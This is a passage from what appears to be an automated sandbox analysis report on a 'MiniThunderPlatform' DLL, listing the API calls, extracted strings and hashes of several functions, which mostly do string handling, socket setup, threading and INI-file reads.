                                                                                                                                              • ?find_first_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIDI@Z.MSVCP71(0000003D,00000000), ref: 10016062
                                                                                                                                              • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1001607A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10016098
                                                                                                                                              • strlen.MSVCR71(00000000,?,?,00000000,?,?), ref: 10016100
                                                                                                                                              • strlen.MSVCR71(?), ref: 1001611A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001613F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001614F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001615F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V12@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@PrivateProfileSectionV01@strlen$?append@?$basic_string@?assign@?$basic_string@?find_first_of@?$basic_string@H_prologNames
                                                                                                                                              • String ID: env
                                                                                                                                              • API String ID: 3046628333-4081402617
                                                                                                                                              • Opcode ID: d8bb6fca1b85637c5f1744c067726447c91ef36dd6736a78ea65d41ec18ad8f1
                                                                                                                                              • Instruction ID: 56c154a8bbaf1107820fcadb2a481fdf8a64cf99c891694d550ec4b29b5f8bbc
                                                                                                                                              • Opcode Fuzzy Hash: d8bb6fca1b85637c5f1744c067726447c91ef36dd6736a78ea65d41ec18ad8f1
                                                                                                                                              • Instruction Fuzzy Hash: 7B511E758001A8DFDB25CB60CC8CADDB7B8EF18341F5441D9E58AA6191DBB46BC9CF60
                                                                                                                                              Function 1006F0A0 Relevance: 28.8, APIs: 19, Instructions: 264COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F153
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F16C
                                                                                                                                                • Part of subcall function 100013D0: __EH_prolog.LIBCMT ref: 100013D5
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100013E8
                                                                                                                                                • Part of subcall function 100013D0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100013F9
                                                                                                                                                • Part of subcall function 100013D0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000), ref: 10001403
                                                                                                                                                • Part of subcall function 100013D0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10001413
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1BF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1D1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F1E6
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,514A63AA,10241D09,000000FF,10023A01), ref: 1002778D
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002779E
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277AC
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277BA
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277C8
                                                                                                                                                • Part of subcall function 10027770: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100277D9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F23A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71 ref: 1006F263
                                                                                                                                                • Part of subcall function 1006E770: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E7EB
                                                                                                                                                • Part of subcall function 1006E770: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E803
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F2BB
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(00000000,102768F0), ref: 1006F2DE
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F2F5
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71 ref: 1006F315
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F343
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F3D5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F3F5
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 1006F420
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1008353D
                                                                                                                                                • Part of subcall function 10083500: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?), ref: 10083560
                                                                                                                                                • Part of subcall function 10083500: RtlInitializeCriticalSection.NTDLL ref: 10083604
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083615
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083626
                                                                                                                                                • Part of subcall function 10083500: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10083637
                                                                                                                                                • Part of subcall function 10083500: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,?,?,?), ref: 10083699
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000,00000000,00000000,00000000), ref: 1006F47A
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F49B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F4B8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006F360
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@$??$?8D@1@@std@@D@2@@0@H_prologV01@@V?$basic_string@$?append@?$basic_string@CriticalInitializeSectionV12@V12@@malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1129024372-0
                                                                                                                                              • Opcode ID: df82370c6a5d8ea4b54703590c3fa0f773a1f7fe67fb214cb8c6971efd7e4699
                                                                                                                                              • Instruction ID: 1e54d6061b0550f604b1462cfa73a362014028559728db64772cefc7744503c9
                                                                                                                                              • Opcode Fuzzy Hash: df82370c6a5d8ea4b54703590c3fa0f773a1f7fe67fb214cb8c6971efd7e4699
                                                                                                                                              • Instruction Fuzzy Hash: 95C136751083818FD370CF24C898BABBBE4FFD9315F404A0DE99A83291DB74A549CB62
                                                                                                                                              Function 1003AD10 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 219networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • rand.MSVCR71(?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?,00000000), ref: 1003AE3C
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?), ref: 1003AEAE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?,?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?), ref: 1003AED4
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?), ref: 1003AEF2
                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000010), ref: 1003AF14
                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,00000000,?,?,1003BA8A,00000000,00000000,?,?,?,?,00000000), ref: 1003AF20
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@?assign@?$basic_string@V12@V12@@$ErrorEventH_prologLastSelectV01@@rand
                                                                                                                                              • String ID: .\connect_manager.cpp$_connecting_queue.count(event_handle)$_connecting_queue[event_handle]._ip_addresses.size()$socket_handle$thunder_assert
                                                                                                                                              • API String ID: 404502743-3806849883
                                                                                                                                              • Opcode ID: 129e4488700a7ed2dc223e724a33264992432e397d592e59593f5f0fcf082126
                                                                                                                                              • Instruction ID: c55c3649b2bea4f1d59166695540d6be5d6b019f00561068088513303db69d21
                                                                                                                                              • Opcode Fuzzy Hash: 129e4488700a7ed2dc223e724a33264992432e397d592e59593f5f0fcf082126
                                                                                                                                              • Instruction Fuzzy Hash: A971CF76A043019FC759DF69CC8981BB3EAFBD9602F45492CF586CB652E730F8848B52
                                                                                                                                              Function 100266F0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 134COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000024,?,?,10241B80,000000FF,1002693A,?,?,?,00000000,?), ref: 10026730
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10026745
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10026757
                                                                                                                                                • Part of subcall function 100264F0: ??3@YAXPAX@Z.MSVCR71(?,?,?), ref: 100265B2
                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(download,?,00001000,?), ref: 10026795
                                                                                                                                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(?), ref: 100267B6
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(00000000,00000000,00000001), ref: 100267CE
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 100267E2
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10026809
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002682F
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000001,?), ref: 10026859
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002689C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100268AE
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100268C3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@V12@$?assign@?$basic_string@$??3@??4?$basic_string@?find@?$basic_string@PrivateProfileSectionV01@
                                                                                                                                              • String ID: =$download
                                                                                                                                              • API String ID: 3715501202-3164794696
                                                                                                                                              • Opcode ID: 9bd88b41d5f3f15470b66bc0ceb1508f9e777e5ea61bfd2d9953bd955a8bb551
                                                                                                                                              • Instruction ID: a023fef14ca76dd256c44445d69db1caa8ef777c0480d3de8aa82a65973d040d
                                                                                                                                              • Opcode Fuzzy Hash: 9bd88b41d5f3f15470b66bc0ceb1508f9e777e5ea61bfd2d9953bd955a8bb551
                                                                                                                                              • Instruction Fuzzy Hash: FD51D1351083859FD724CF64D89CBEABBE4EB99744F40491CF5CA83282DBB0658DCB62
                                                                                                                                              Function 1021AC50 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 99synchronizationthreadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00000000,00000000), ref: 1021AC86
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(last thread not stopped, now startanother thread at one thread obj), ref: 1021AC99
                                                                                                                                                • Part of subcall function 10001598: __EH_prolog.LIBCMT ref: 1000159D
                                                                                                                                                • Part of subcall function 10001598: ??0exception@@QAE@XZ.MSVCR71(?,?,1001E6D1,?,?,?,?), ref: 100015A9
                                                                                                                                                • Part of subcall function 10001598: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,1001E6D1,?,?,?,?), ref: 100015BF
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B6BA0), ref: 1021ACC2
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 1021ACCB
                                                                                                                                              • ResetEvent.KERNEL32(?,?,00000000), ref: 1021ACD6
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_0021AB50,00000000,00000000,0000000C), ref: 1021ACEC
                                                                                                                                              • __RTtypeid.MSVCR71(00000000), ref: 1021ACF6
                                                                                                                                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71 ref: 1021AD1E
                                                                                                                                              • ?name@type_info@@QBEPBDXZ.MSVCR71(-00000004,?), ref: 1021AD66
                                                                                                                                              • WritePrivateProfileStringA.KERNEL32(dl_crt,-00000006), ref: 1021AD75
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AD87
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AD9C
                                                                                                                                              Strings
                                                                                                                                              • dl_crt, xrefs: 1021AD70
                                                                                                                                              • last thread not stopped, now startanother thread at one thread obj, xrefs: 1021AC90
                                                                                                                                              • error.dat, xrefs: 1021AD0A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$??0exception@@?name@type_info@@CloseCreateEventExceptionH_prologHandleObjectPrivateProfileResetSingleStringThreadThrowTtypeidV01@V01@@WaitWriteY?$basic_string@
                                                                                                                                              • String ID: dl_crt$error.dat$last thread not stopped, now startanother thread at one thread obj
                                                                                                                                              • API String ID: 3196620889-3090114385
                                                                                                                                              • Opcode ID: a1172def8e7be8627b62b2eadf164501b651cf94c5c867666823416be0018870
                                                                                                                                              • Instruction ID: 2e941530730813ec7dba99eaa6cd3383bc57037a6a2da6aa8cd2b20ed6a84487
                                                                                                                                              • Opcode Fuzzy Hash: a1172def8e7be8627b62b2eadf164501b651cf94c5c867666823416be0018870
                                                                                                                                              • Instruction Fuzzy Hash: 824167755083509FD724CB24CC8DF9BB7E8FB99705F008A1DF49A87291EB34A584CBA2
                                                                                                                                              Function 100B2320 Relevance: 24.3, APIs: 16, Instructions: 324COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 100B23A3
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B23B4
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B23EB
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2400
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B2424
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2438
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,00000000,00000001,00000000), ref: 100B246D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B251F
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2531
                                                                                                                                                • Part of subcall function 100EA175: __EH_prolog.LIBCMT ref: 100EA17A
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,100B2373,00000000), ref: 100EA19B
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1AB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1BB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1CB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1DB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1EB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA1FB
                                                                                                                                                • Part of subcall function 100EA175: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,100B2373,00000000), ref: 100EA20B
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CB3
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CC4
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CD5
